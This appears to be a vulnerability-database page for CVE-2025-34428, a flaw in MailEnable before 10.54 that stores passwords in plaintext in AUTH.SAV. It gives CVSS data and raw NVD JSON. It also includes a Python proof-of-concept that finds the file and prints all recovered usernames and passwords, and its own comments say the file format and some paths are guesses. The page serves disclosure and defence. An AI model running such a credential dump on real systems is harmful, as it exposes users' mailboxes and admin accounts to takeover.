Security Vulnerability Report
CVE-2025-34428 CVSS 7.8 HIGH

CVE-2025-34428

Published: 2025-12-10 19:16:14
Last Modified: 2025-12-17 17:00:33

Description

MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.SAV with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:* - VULNERABLE
MailEnable < 10.54

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-34428 PoC - MailEnable AUTH.SAV Cleartext Credential Storage
#
# Shows that AUTH.SAV can be opened and read as plain text by the account
# running the script. For defenders, the two things to check are who is
# allowed to read the file (its filesystem ACL) and which MailEnable version
# is installed; the advisory lists versions prior to 10.54 as affected.
#
# NOTE(review): the "username:password" line layout and the candidate paths
# below are assumptions made by this PoC. The advisory text only states that
# passwords are stored in plaintext in AUTH.SAV; confirm both against a real
# installation before relying on the output.

import os
import sys


def read_auth_sav(file_path):
    """Parse a MailEnable AUTH.SAV file into username/password records.

    Each line is stripped, and any line containing ':' is split on ':'.
    The first field becomes 'username' and the second 'password'; further
    colon-separated fields are discarded. Lines without ':' are skipped.
    Bytes that are not valid UTF-8 are dropped silently (errors='ignore').

    NOTE(review): the colon-separated layout is presumed, not documented on
    the advisory page -- verify against the actual file.

    Args:
        file_path: Path of the file to read.

    Returns:
        A list of {'username': ..., 'password': ...} dicts in file order.
        An empty list is returned, after printing a message, when the file
        is missing or cannot be read by the current account.
    """
    try:
        with open(file_path, 'r', encoding='utf-8', errors='ignore') as handle:
            stripped = (raw.strip() for raw in handle)
            # A line containing ':' always splits into at least two fields.
            fields = (entry.split(':') for entry in stripped if ':' in entry)
            return [{'username': f[0], 'password': f[1]} for f in fields]
    except FileNotFoundError:
        print(f"[-] File not found: {file_path}")
        return []
    except PermissionError:
        # Access denied means the current account cannot read the file,
        # which is the outcome a correctly restricted ACL should produce.
        print(f"[-] Permission denied: {file_path}")
        return []


def main():
    """Locate AUTH.SAV and print every record parsed from it.

    Uses the path given as the first command-line argument when present;
    otherwise tries the built-in candidate list and stops at the first path
    that exists.
    """
    # NOTE(review): candidate locations are this PoC's guesses. MailEnable is
    # distributed as a Windows product, so the two Unix-style entries look
    # speculative -- confirm the real path on the host being assessed.
    candidate_paths = [
        r'C:\Program Files\Mail Enable\Config\AUTH.SAV',
        r'C:\Program Files (x86)\Mail Enable\Config\AUTH.SAV',
        r'/opt/mailenable/config/AUTH.SAV',
        r'/var/mailenable/config/AUTH.SAV'
    ]

    print("[*] CVE-2025-34428 - MailEnable AUTH.SAV Credential Extraction")
    print("[*] Target: MailEnable < 10.54")

    # An explicit path on the command line replaces the candidate list.
    search_list = [sys.argv[1]] if len(sys.argv) > 1 else candidate_paths

    # Only the first existing path is examined.
    located = next((p for p in search_list if os.path.exists(p)), None)
    if located is None:
        print("[-] AUTH.SAV file not found in default locations")
        print("[*] Please provide the correct path to AUTH.SAV")
        return

    print(f"\n[+] Found AUTH.SAV at: {located}")
    entries = read_auth_sav(located)
    if not entries:
        print("[-] No credentials found in file")
        return

    print(f"[+] Extracted {len(entries)} credential(s):")
    for entry in entries:
        print(f" Username: {entry['username']}")
        print(f" Password: {entry['password']}")
        print("-" * 40)


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34428", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:13.570", "lastModified": "2025-12-17T17:00:32.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.SAV with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:*", "versionEndExcluding": "10.54", "matchCriteriaId": "E4DAB799-EDB6-48D7-A7FD-77D9910CB308"}]}]}], "references": [{"url": "https://mailenable.com/Standard-ReleaseNotes.txt", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.mailenable.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-sav", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}